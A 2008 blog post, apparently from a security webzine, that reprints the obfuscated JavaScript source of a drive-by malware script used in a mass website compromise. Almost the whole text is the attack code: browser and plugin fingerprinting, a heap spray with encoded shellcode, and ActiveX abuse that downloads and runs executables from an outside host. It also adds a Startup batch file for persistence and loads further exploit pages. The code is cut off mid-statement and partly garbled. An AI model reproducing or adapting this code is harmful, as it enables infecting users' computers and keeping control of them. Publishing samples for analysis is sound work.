Javascript Malware Source Code
March 22, 2008 – 12:38 PMThis is how dangerous the web has become. Lately it is estimated that over 10K of websites fell victim to a large attack that included a remote Javascript file into the title tag of a web page. The JS malware exploits vulnerabilities in Windows, RealPlayer, and other applications to break into insecure PC’s. The McAfee researchers didn’t release the JS malware source, but luckily I’m on Ph4nt0m’s feed list and they found it’s source. What can I say, it’s interesting code and heavily obfuscated. I haven’t got the time to analyze it yet, because I wanted to share it with all my readers first. It is very important that this knowledge is being shared instead of being swept under the rug, and so I place the file here so that we can all learn from it. One cool feature seems that it requires a spoofed header to locate the and retrieve the JS malware, another clever way of hiding it.
Thanks to Ph4nt0m for finding the source.
Source Code:
http://b.njnk.net:80/E/J.JS
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == - 1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2;
}
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == - 1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
z1IlakFl0X += z1IlakFl0X;
}
z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
return z1IlakFl0X;
};
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0 x0c0c0c0c;
%" + "u" + "ee83%ufe3" + "a%u06" + "4e綍謄菎ᣁ諨%u" + "ffff%u"
+ "83ff%u0" + "c" + "c1Ƹ敮" + "%uc17" + "4ࣸ桐%" + "u6977楮" + "%udc"
+ "8b剑s" + "%u0" + "4" + "55奚%" + "ud08b%u" + "68e8" + "�㏿%" + "u"
+ "50c0偐%u50" + "50嗿褜㑅" + "쀳偐偐嶍區%u75f" + "fT⁕%u458" + "9" + "%u"
+ "eb38㍴%u66c" + "0%u6c" + "b8偬%u7" + "1" + "68%u2e" + "31%" + "u8"
+ "964" + "づ%u" + "c033" + "%" + "ub050%u50" + "82%u02b" + "0㉐僀끐셀"
+ "ᣠp" + "%u30" + "75嗿" + "茈%" + "ud3" + "74%" + "u4589㌼%u66c"
+ "0%u0cb" + "8%u2b0" + "1诠" + "%u8df" + "4ў晓Ҹ" + "倁䚍%u50" + "08%u75"
+ "ffX%u24" + "55%u" + "468b%u85" + "04%u" + "74c0㌖%u50" + "c0%u46"
+ "8d倄盿%u8d" + "0" + "4" + "ࡆ" + "p㱵嗿" + "㱵" + "%u55f" + "f㌐%uff0"
+ "fふ%u55" + "ff%u8" + "304ી%u" + "ff50ᡕ%" + "uf7eb%" + "uf3e" + "8%u"
+ "ff" + "f" + "e" + "棿瑴㩰⼯%u6" + "a6e%u" + "6b6e渮%u7" + "465%"
+ "u632f%u69" + "67%" + "u622d湩樯%u2" + "f6c%u" + "6c6a%u6" + "16"
+ "f敤" + "%" + "u2e72" + "汰" + "%u6" + "c3f慯晤汩㵥%u2f7" + "1" + "%"
+ "u" + "3171搮汬%u" + "f" + "fff");*var z1IlarFl0X = unescape("%"
+ "ueb55㍮%" + "u64c" + "0䂋蔰%u78c" + "0%u" + "560d%" + "u408b%" + "u"
+ "8b0cᱰ%" + "u8badࡀ%uc3" + "5e䂋" + "茴糀䂋쌼%u8b6" + "0%u2" + "46c"
+ "謤㱅%u7c" + "8b%u" + "78" + "05ﴃ例%u" + "8b18%u" + "20" + "5f�㏣%u8b"
+ "49" + "謴%u" + "f50" + "3쀳%uf" + "c99%" + "u84ac%u74c" + "0섇්퀃"
+ "%" + "uf4eb%u543" + "b⠤%ue27" + "5%u5" + "f" + "8b" + "̤曝ಋ譋ᱟ%udd"
+ "03ҋ%u03" + "8b觅%u" + "2444%u61" + "1" + "c굒%u" + "52" + "50ꧨ"
+ "�%" + "u" + "89" + "ff茇" + "ࣄ잃" + "㬄痱쏬于%" + "uec0" + "e"
+ "%u17a" + "5%u7c" + "0" + "1%u7" + "91f%u" + "97fbﹲᚳ䦰�" + "䐩埨縏䮋%u5f"
+ "e" + "3%" + "u835e%u7" + "cec" + "%u4ce" + "8%" + "uffff%u8b"
+ "ff%uebd" + "0%ue8" + "0" + "5%uf" + "ff9�%" + "ueb58赦"
+ "䁽肤%uf" + "f7e%u7" + "5ff%u4f" + "f9%u17f" + "6" + "
var z1IlaCFl0X = 0 x400000;
var z1IlaWFl0X = z1IlarFl0X.length * 2;
var z1IlalFl0X = z1IlaCFl0X - (z1IlaWFl0X + 0 x38);
var z1IlakFl0X = unescape("邐%u9" + "090邐%u9" + "090邐邐%" + "u9090%u9" + "09" + "0");
z1IlakFl0X = x0r1ax2Z(z1IlakFl0X, z1IlalFl0X);
z1IlaZFl0X = (z1IlbaFl0X - 0 x400000) / z1IlaCFl0X;
z1IlbyFl0X = new Array();
for(i = 0; i < z1IlaZFl0X; i++ ) {
z1IlbyFl0X[ i] = z1IlakFl0X + z1IlarFl0X;
}
z1IlaSFl0X = 1;
}
catch(e) {}
};
function x0r1aW2Z(z1IlavFl0X, n) {
var z1IlbvFl0X = null;
try {
eval("z1IlbvFl0X = z1IlavFl0X" + ".C" + "reat" + "eObject(n" + ")")
}
catch(e) {}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvF" + "l0X = z1Ilav" + "Fl0X." + "Cre" + "ateObject(n, \"\"" + ")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1I" + "lbv" + "Fl0X" + " = z1" + "IlavFl0X.CreateObj" + "ect(n, \"\"," + " \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvFl" + "0X = " + "z1IlavFl0X.GetObj" + "ect(" + "\"" + "\", n)")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0X = z" + "1IlavFl0X.G" + "etO" + "bject" + "(n, \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0" + "X = z1Ila" + "v" + "Fl0X.GetObject(n)")
}
catch(e) {}
}
return(z1IlbvFl0X);
};
function x0r1aN2Z(xml, z1IlavFl0X, url, z1IlczFl0X) {
xml.open("GET", url, false);
xml.send(null);
var z1IlcGFl0X = xml.responseBody;
z1IlavFl0X.Type = 1;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Open();
z1IlavFl0X.Write(z1IlcGFl0X);
z1IlavFl0X.SaveToFile(z1IlczFl0X, 2);
z1IlavFl0X.Close();
};
function x0r1bd2Z(z1IlavFl0X, z1IlbZFl0X, z1IlcaFl0X) {
try {
z1IlavFl0X.Type = 2;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Charset = "Win" + "dows-" + "1251";
z1IlavFl0X.Open();
z1IlavFl0X.WriteText(z1IlbZFl0X);
z1IlavFl0X.SaveToFile(z1IlcaFl0X, 2);
z1IlavFl0X.Close();
}
catch(z1IlcKFl0X) {}
};
function z1IlEFl0X(a) {
var z1IlbmFl0X = "/cgi-b" + "in/" + "jl/jload" + "er.pl?load" + "file=q";
var z1IlaMFl0X = x0r1aW2Z(a, "m" + "sxml2.XM" + "LHTTP");
if(! z1IlaMFl0X) {
z1IlaMFl0X = x0r1aW2Z(a, "Microsoft" + ".XMLHTT" + "P");
}
var z1IlbbFl0X = x0r1aW2Z(a, "adodb" + ".st" + "ream");
var s = x0r1aW2Z(a, "WScript" + ".Shel" + "l");
var e = s.Environment("Proce" + "ss");
var z1IlckFl0X = "ht" + "tp://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "1.dll";
var z1IlcgFl0X = "http" + "://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "2l.jpg";
var z1IlcCFl0X = e.Item("TE" + "MP") + "\\q1.dl" + "l";
var z1IlclFl0X = e.Item("TEM" + "P") + "\\q2l." + "exe";
var z1IlcHFl0X = e.Item("PROGRAM" + "FIL" + "ES");
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlckFl0X, z1IlcCFl0X);
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlcgFl0X, z1IlclFl0X);
var z1IlbLFl0X = "\"" + z1IlclFl0X + "\"" + " \"" + z1IlcCFl0X + "\"" + "
\"" + z1IlcHFl0X + "\\I" + "nternet Exp" + "lorer\\ie" + "xp" + "lore.exe\"";
x0r1bd2Z(z1IlbbFl0X, "@ech" + "o" + " off\n" + z1IlbLFl0X + "\n",
e.Item("USERP" + "RO" + "FILE") + "\\Start M" + "enu\\Pr" + "og" +
"rams\\Startup\\sta" + "rtu" + "p.bat");
try {
s.run(z1IlbLFl0X);
return true;
}
catch(e) {}
return false;
};
function x0r1aH2Z() {
if(navigator.userAgent.indexOf("Oper" + "a") == - 1 && navigator.userAgent.indexOf("Firefo" + "x") == - 1 && navigator.userAgent.indexOf("M" + "SIE") != - 1 && navigator.userAgent.indexOf("W" + "indows") != - 1) {
z1IlaOFl0X = x0r1aQ2Z();
z1IlapFl0X = x0r1aI2Z();
return "ie";
}
if(navigator.userAgent.indexOf("Firefo" + "x") != - 1) {
return "firefo" + "x";
}
if(navigator.userAgent.indexOf("O" + "pera") != - 1) {
return "oper" + "a";
}
return "unkno" + "wn";
};
function x0r1an2Z() {
z1IlatFl0X = document.createElement("DIV");
z1IlatFl0X.id = "z1I" + "latF" + "l0X";
z1IlatFl0X.addBehavior("#" + "default#cli" + "entCaps");
document.body.appendChild(z1IlatFl0X);
};
function z1IlIFl0X() {
var version = 0, qt_control;
if(z1IlaAFl0X == "ie") {
try {
qt_control = new ActiveXObject('QuickTime.QuickTime');
}
catch(e) {
return 0;
}
delete qt_control;
if(z1IlapFl0X < 700) {
try {
var qt_check = new ActiveXObject('QuickTimeCheckObject.QuickTimeCheck');
version = (qt_check.z1IlblFl0X & 0 xffff0000) >> 16;
delete qt_check;
}
catch(e) {}
}
else {
version = 0 x100;
}
}
else {
if(navigator.plugins != null && navigator.plugins.length > 0) {
var plugin_str = null;
for(var i = 0; i < navigator.plugins.length; i++ ) {
var z1IlaPFl0X = navigator.plugins[ i];
if(z1IlaPFl0X.name.indexOf("QuickTim" + "e") > - 1) {
plugin_str = z1IlaPFl0X.name;
}
}
var z1IlcDFl0X = /[\d.]+/ g;
var z1IlceFl0X = z1IlcDFl0X.exec(plugin_str);
var z1IlaFl0X = z1IlceFl0X[ 0] .split(".");
version = (parseInt(z1IlaFl0X[ 0] ) << 8) + (parseInt(z1IlaFl0X[ 1] ) << 4);
if(z1IlaFl0X.length > 2) {
version += parseInt(z1IlaFl0X[ 2] );
}
}
}
return version;
};
function x0r1aQ2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X;
try {
x0r1an2Z();
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{89820" + "200-" +
"ECBD-11CF" + "-8" + "B85-00AA005B4383}", "compo" + "nent" + "id");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlbsFl0X = parseInt(z1IlbdFl0X[ 0] ) * 10000000000 +
parseInt(z1IlbdFl0X[ 1] ) * 100000000 + parseInt(z1IlbdFl0X[ 2] ) * 10000 + parseInt(z1IlbdFl0X[ 3] );
}
catch(e) {
z1IlbsFl0X = 0;
}
return z1IlbsFl0X;
};
function x0r1aI2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X = 0;
try {
if(! z1IlatFl0X) {
x0r1an2Z();
}
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{898202" + "00-ECBD-11CF-8B85-00" + "AA" + "005B4383" + "}", "c" + "ompon" + "entid");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlaBFl0X = parseInt(z1IlbdFl0X[ 0] ) * 100 + parseInt(z1IlbdFl0X[ 1] );
}
catch(e) {
var z1IlcDFl0X = /MSIE\s+(\d+)\.(\d+)/;
var z1IlbjFl0X = new Array;
if(z1IlbjFl0X = z1IlcDFl0X.exec(navigator.userAgent)) {
z1IlaBFl0X = parseInt(z1IlbjFl0X[ 1] ) * 100 + parseInt(z1IlbjFl0X[ 2] );
}
}
return z1IlaBFl0X;
};
function x0r1aD2Z() {
var z1IlasFl0X, z1IlbdFl0X;
var z1IlbrFl0X = "", z1IlaBFl0X = 0;
z1IlbXFl0X = /\sFirefox\/([\d\.]+)\b/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
return 0;
}
z1IlbdFl0X = z1IlasFl0X[ 1] .split(".");
z1IlaBFl0X = (parseInt(z1IlbdFl0X[ 0] ) * 1000000) + (parseInt(z1IlbdFl0X[ 1] ) * 10000);
if(z1IlbdFl0X.length > 2) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 2] ) * 100;
}
if(z1IlbdFl0X.length > 3) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 3] );
}
return z1IlaBFl0X;
};
function x0r1aJ2Z() {
var z1IlasFl0X;
var z1IlbnFl0X = 0;
z1IlbXFl0X = /Windows\sNT\s(\d)\.(\d)/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
z1IlbXFl0X = /Windows\s98/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(z1IlasFl0X) {
z1IlbnFl0X = 48;
return z1IlbnFl0X;
}
return 0;
}
z1IlbnFl0X = parseInt(z1IlasFl0X[ 1] ) * 10 + parseInt(z1IlasFl0X[ 2] );
return z1IlbnFl0X;
};
function x0r1aE2Z(z1IlbOFl0X) {
var z1IlcIFl0X = document.getElementById("z1" + "IlbeFl" + "0X");
z1IlcIFl0X.src = z1IlbOFl0X;
return true;
};
function x0r1au2Z(z1IlbRFl0X) {
var iframe = document.getElementById("z1Il" + "aE" + "Fl0X");
iframe.src = z1IlbRFl0X;
return true;
};
function x0r1av2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1aE2Z("http" + "://" + z1IlaoFl0X + "/E/isci/isc" + "i_my" + ".js");
};
function x0r1aT2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff1" + "04/" + "ff104.htm");
};
function x0r1aS2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff15" + "4/ff154" + ".htm");
};
function x0r1aB2Z() {
if(z1IlbIFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/vm" + "l/vml" + ".htm");
};
function x0r1aG2Z() {
if(z1IlbHFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E" + "/" + "ani/ani5.htm");
};
function x0r1az2Z() {
var z1IlbEFl0X = 0;
var z1IlctFl0X = false;
if(z1IlbiFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
var z1IlbpFl0X = new Array("{BD" + "9" + "6" +
"C556-65A3-11D0-983A-00C04FC2" + "9E30}", "{A" + "B9BCEDD-EC" +
"7E-47E1-9322-D4A210617" + "116" + "}", "{00" + "06F033-" + "0000-0000-C0" +
"00" + "-000000000046}", "{0006F03A-" + "00" + "00-000" + "0-C000-000" +
"000000046}", "{6" + "e" + "32070a-766d-4" + "ee6-879c-dc1fa" + "91d2fc3}",
"{6414512B-B978-" + "45" + "1D-A0D8-FCF" + "DF33E" + "833C}", "{7F5B7F63-F0" +
"6F-4" + "33" + "1-8A26-" + "339E03C0AE3D}", "{06723E09-F4" + "C2-" +
"43c8-8358-09FCD1" + "DB" + "0766}", "{639F725F-1" + "B2D-4831-A9" + "FD-874" +
"84768" + "2010}", "{BA" + "0185" + "99-1" + "DB3-44f9-83" + "B4-461454C84BF8}", "{D0C07D56-7C69-43" + "F1" + "-B4A0-25F5A11F" + "AB1" +
"9}", "{E8CCCDDF-CA2" + "8-" + "496" + "b-B050-" + "6C07C962476B}", "{BD96C5" +
"56-6" + "5A3-11D" + "0-9" + "83A-00C04FC29E36}", null);
while(z1IlbpFl0X[ z1IlbEFl0X] ) {
var z1IlbFFl0X = null;
z1IlbFFl0X = document.createElement("objec" + "t");
z1IlbFFl0X.setAttribute("clas" + "sid", "clsi" + "d:"
+ z1IlbpFl0X[ z1IlbEFl0X] .substring(1, z1IlbpFl0X[ z1IlbEFl0X] .length - 1));
if(z1IlbFFl0X) {
try {
var z1IlcvFl0X = x0r1aW2Z(z1IlbFFl0X, "S" + "hell." + "Application");
if(z1IlcvFl0X) {
z1IlctFl0X = z1IlEFl0X(z1IlbFFl0X);
return z1IlctFl0X;
}
}
catch(e) {}
}
z1IlbEFl0X++;
}
return false;
};
function z1IlNFl0X() {
if(z1IlbCFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
if(z1IlaKFl0X == 0) {
return false;
}
if(z1IlaKFl0X > 0 x730) {
return false;
}
z1IltFl0X();
if(z1IlaAFl0X == "ie") {
document.getElementById("tmp_d" + "iv1").innerHTML = "
Source: The Hacker Webzine
You must be logged in to post a comment.